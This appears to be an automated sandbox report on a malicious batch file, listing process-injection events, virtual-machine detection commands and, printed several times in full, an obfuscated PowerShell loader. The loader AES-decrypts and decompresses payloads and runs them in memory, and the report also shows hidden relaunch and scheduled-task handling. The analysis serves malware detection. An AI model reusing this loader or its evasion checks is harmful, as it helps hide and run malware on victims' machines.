Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BF59D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 253FC3D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A5AF330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A4670000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1780D3E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BF59D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 253FC3D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A5AF330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A46A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1780D3E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 21D595A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 21D59C90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1EA080B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085AEE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 29E3BCD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 29E3BF00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1956F090000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2A3ED7F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CD8E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CF9E0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF30000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf 